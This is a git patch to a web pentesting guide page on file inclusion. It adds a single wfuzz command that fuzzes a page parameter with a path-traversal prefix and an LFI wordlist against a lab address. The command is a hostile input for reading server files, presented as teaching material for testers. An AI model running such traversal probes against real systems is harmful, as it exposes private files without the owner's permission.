From 2fafdc0afa3ec7433d62b0fdb56a6dc48d8bd14e Mon Sep 17 00:00:00 2001 From: CPol Date: Sun, 27 Dec 2020 12:39:54 +0000 Subject: [PATCH] GitBook: [master] one page modified --- pentesting-web/file-inclusion.md | 4 ++++ 1 file changed, 4 insertions(+) diff --git a/pentesting-web/file-inclusion.md b/pentesting-web/file-inclusion.md index 4f0adb61..9596792d 100644 --- a/pentesting-web/file-inclusion.md +++ b/pentesting-web/file-inclusion.md @@ -13,6 +13,10 @@ A interesting tool to exploit this vulnerability: [https://github.com/kurobeats/ ## Blind - Interesting - LFI2RCE files +```python +wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ +``` + ### **Linux** **Mixing several \*nix LFI lists and adding more paths I have created this one:**